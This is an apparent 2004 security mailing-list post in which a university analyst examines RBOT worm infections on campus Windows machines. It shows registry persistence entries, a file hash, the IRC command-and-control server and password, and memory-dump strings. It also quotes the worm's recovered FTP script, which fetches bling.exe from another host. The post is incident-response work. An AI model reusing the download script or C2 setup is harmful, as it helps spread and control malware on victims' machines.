Winupdate2date.exe: New worm variant?
Anderson Johnston <[email protected]>
| Newsgroups | gmane.comp.security.intrusions |
|---|---|
| Message-ID | <[email protected]> |
Going over a Windows machine infected with RBOT:
------------------------------------------------------------------
------------------ First Machine ---------------------------------
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
Microsoft Update Machine REG_SZ servicz.exe
msupdates REG_SZ msupdt.exe
[root@gecko 040920-1]# cd ../040920-2
[root@gecko 040920-2]# more run.reg
------------------------------------------------------------------
I came across a file that seemed to point to another campus machine as the
source of the infection:
------------------------------------------------------------------
# cat o
open 130.85.ccc.ddd 19302
user 1 1
get bling.exe
quit
------------------------------------------------------------------
------------------ Second Machine --------------------------------
This second machine turned have an infection with different (extra?)
characteristics:
------------------------------------------------------------------
# cat run.reg
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
Cryptographic Service REG_SZ C:\WINDOWS\System32\ioplmwb.exe
msupdates REG_SZ msupdt.exe
WindowsRegKey update2date REG_SZ winupdate2date.exe
------------------------------------------------------------------
------------------ Third Machine ---------------------------------
Then we turned up a third machine in the same building that also had
winupdate2date.exe (and did not have msupdt.exe):
------------------------------------------------------------------
# cat run.reg
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
McAfeeUpdaterUI REG_SZ "C:\Program Files\Network
Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
ShStatEXE REG_SZ "C:\Program Files\Network
Associates\VirusScan\SHSTAT.EXE" /STANDALONE
NDPS REG_SZ C:\WINDOWS\System32\dpmw32.exe
NWTRAY REG_SZ NWTRAY.EXE
WindowsRegKey update2date REG_SZ winupdate2date.exe
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents
------------------------------------------------------------------
The file winupdate2date.exe has MD5 hash:
047379e3e9d02ced7e5dbf046a9b1f4c
I haven't been able to find a reference for it. Has anyone else seen it
(and/or know anything about it)?
BTW, we found the third machine through a snort rule that detects RBOT
IRC traffic. It's IRC channel was to server 66.111.42.128.
09/21/04 14:19:28 dns 66.111.42.128
nslookup 66.111.42.128
Canonical name: unknown.sagonet.net
Addresses:
66.111.42.128
The following text strings were at the beginning of the (slightly
sanitized) process memory dumps of winupdate2date.exe on the second
and third machines:
------------------ PmDump from Second Machine ---------------------
# strings pmdump_3888_winupdate2date.exe.txt | more
[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135 delay 3 secondi 999 us2052150 thre
[MAIN]: Joined channel: #!$!#.
PONG
:irc.NoNet.net
PING :irc.NoNet.net
PING
vwmdqlpk
2052\
<DNS name of system deleted from this line - AFJ>
NICK vwmdqlpk
USER oimxhfsl 0 0 :vwmdqlpk
oimxhfsl
server.maxshells.com
#!$!#
letmein
vwmdqlpk
WinSock 2.0
Running
winupdate2date
& !
.exe
winupdate2date.exe
C:\WINDOWS\System32
C:\WINDOWS\System32\winupdate2date.exe
CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
tuvwxyz{|}~
w[IDENTD]: Server running on Port: 113.
IsProcessorFeature`
Actx
[IY-
SsHd,
[IY-H
SsHd,
C:\WINDOWS\System32\winupdate2date.exe 1792
"C:\WINDOWS\system32\winupdate2date.exe"
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
-v1.3.14.3.2.22
er\Advanced
-v1.2.840.113549.1.1.1
3v8?
3v`?
CryptSIPDllPutSignedDataMsg
CryptSIPDllGetSignedDataMsg
CryptSIPDllRemoveSignedDataMsg
CryptSIPDllCreateIndirectData
CryptSIPDllVerifyIndirectData
CryptSIPDllIsMyFileType
CryptSIPDllIsMyFileType2
CryptDllExportPublicKeyInfoEx
------------------- PmDump from Third Machine --------------------------
[root@gecko 040920-3]# strings pmdump_1156_winupdate2date.exe.txt | more
[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135 delay 3 secondi 999 us2046150 thre
[MAIN]: Joined channel: #!$!#.
PONG
:irc.NoNet.net
PING :irc.NoNet.net
PING
ongvjfr
2046H
<DNS name of system deleted from this line - AFJ>
NICK ongvjfr
USER webxah 0 0 :ongvjfr
webxah
server.maxshells.com
#!$!#
letmein
ongvjfr
WinSock 2.0
Running
winupdate2date
& !
.exe
winupdate2date.exe
C:\WINDOWS\System32
C:\WINDOWS\System32\winupdate2date.exe
CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
tuvwxyz{|}~
w[IDENTD]: Server running on Port: 113.
IsProcessorFeature
Actx
[IY-
SsHd,
[IY-H
SsHd,
C:\WINDOWS\System32\winupdate2date.exe 1792 "C:\WINDOWS\system32\winupdate2date.exe"
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
------------------------------------------------------------------------------
** Andy Johnston ([email protected]) * **
** * PGP key:(afj2002) 4096/8448B056 **
** Office of Information Technology, UMBC * 4A B4 96 64 D9 B6 EF E3 21 9A **
** 410-455-2583 (v)/410-455-1065 (f) * 46 1A 37 11 F5 6C 84 48 B0 56 **
------------------------------------------------------------------------------
_______________________________________________
Intrusions mailing list
[email protected]
http://www.dshield.org/mailman/listinfo/intrusions